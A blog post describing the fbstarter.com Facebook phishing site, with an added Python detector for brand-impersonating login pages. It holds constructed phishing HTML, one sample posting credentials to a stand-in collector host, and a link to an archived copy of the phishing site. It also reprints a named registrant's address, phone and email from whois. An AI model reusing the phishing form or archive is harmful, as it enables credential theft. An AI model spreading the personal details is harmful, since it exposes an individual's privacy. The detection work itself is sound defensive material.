Facebook Phishing site: fbstarter.com
I got a Facebook mail from a friend today titled “Look at this!” with a link to fbstarter.com.
The site itself looks just like Facebook (even the code view and CSS – screenshot here) – but the site didn’t seem to offer much except for a login. I put in dummy information and was redirected to the real Facebook site with this message:
It’s good to know that Facebook is already on top of it.
When I asked my friend how he came to find / be infected with the exploit (my initial thought was that it was a rogue app) he replied: “Link from a friend on Facebook.” My guess is that the site logs in as you and sends a message to all your friends to infect more people (he told me he looked through his sent mail and apparently it’s been sending emails out 15-16 at a time).
What’s interesting about this exploit is that there really isn’t any XSS or CSRF involved – Facebook didn’t do anything wrong – it’s just plain social engineering: a site dresses itself up to look like Facebook and asks you to log in.
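Because nothing on Facebook's side is broken, the only place to catch a page like this is at the client or proxy, by asking two questions: does the host trade on the brand name without being the brand's domain, and where does the password form actually send the credentials? The following is an added example (not code from the original post, and not anything the site used) that performs both checks on constructed HTML samples; the allowlist, brand tokens and the simplified registrable-domain logic are assumptions for illustration.

```python
"""Added example: flag login pages that impersonate a brand.

Not part of the original post. The allowlist, the brand tokens, the
simplified eTLD+1 logic and the HTML samples are all constructed here.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

# Assumption: the registrable domains the brand legitimately uses.
LEGIT_DOMAINS = {"facebook.com"}
# Assumption: tokens that signal a host is trading on the brand name.
BRAND_TOKENS = ("facebook", "fb")


def registrable_domain(hostname: str) -> str:
    """Simplified eTLD+1 (last two labels). Adequate for .com/.net names;
    a real deployment would consult the public suffix list instead."""
    labels = hostname.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else hostname.lower()


class LoginFormParser(HTMLParser):
    """Collect every <form> action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyse_login_page(page_url: str, html: str) -> list:
    """Return a list of findings for the page; an empty list means clean."""
    findings = []
    host = urlparse(page_url).hostname or ""
    host_domain = registrable_domain(host)

    # Check 1: brand token in a hostname that is not the brand's domain.
    if host_domain not in LEGIT_DOMAINS and any(tok in host for tok in BRAND_TOKENS):
        findings.append(f"brand token in non-brand host: {host}")

    # Check 2: a password form whose target (relative or absolute) is not
    # the brand's domain. Relative actions resolve against the page URL,
    # so a lookalike posting "back to itself" is caught as well.
    parser = LoginFormParser()
    parser.feed(html)
    for form in parser.forms:
        if not form["has_password"]:
            continue
        target = urljoin(page_url, form["action"] or page_url)
        target_domain = registrable_domain(urlparse(target).hostname or "")
        if target_domain not in LEGIT_DOMAINS:
            findings.append(f"password form posts to non-brand domain: {target_domain}")
    return findings


# Constructed sample: a lookalike login page that posts credentials back to
# its own host, the behaviour the post describes.
PHISH_HTML = """<html><body><form method="post" action="/login.php">
<input name="email"><input type="password" name="pass"></form></body></html>"""

# Constructed sample: identical markup on the legitimate domain, for contrast.
LEGIT_HTML = PHISH_HTML

# Constructed sample: a lookalike whose form posts to a separate collector host.
RELAY_HTML = """<html><body><form action="http://collector.example/submit">
<input name="email"><input type="password" name="pass"></form></body></html>"""

if __name__ == "__main__":
    print(analyse_login_page("http://fbstarter.com/", PHISH_HTML))
    print(analyse_login_page("https://www.facebook.com/", LEGIT_HTML))
    print(analyse_login_page("http://fbaction.net/login", RELAY_HTML))
```

The second check is the one that matters most: a page can copy the brand's HTML and CSS byte for byte, but it still has to deliver the typed password to a host the attacker controls, and that destination is visible in the form before anything is submitted.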
I went ahead and archived the fbstarter.com site as I’m sure it’ll be taken down soon:
http://insecureweb.com/files/fbstarter/ (doesn’t include images)
If you are infected – change all your passwords immediately. Although it’s unlikely the perpetrators can access your other sites, many people use the same password, or variations of the same password, for many sites. It would be in your best interest to change all your passwords regardless of whether they’re the same or not (at the very least for a clear conscience).
In addition, consider upgrading to Firefox 3 if you haven’t, which attempts to block web forgery attempts (after they are reported – see what happens when I try to visit fbaction.net, a similar forgery site).
A whois on the owner of the domain shows our friends in Russia as usual:
Ad / Name: Boris Soroka
Adres: Stavropolskaya str. d.18 kv.164 Moscow Moscow 109386
Tel: +7.4957851102
Faks:
E-posta: vy@seostudio.at
Guncelleme / Updated: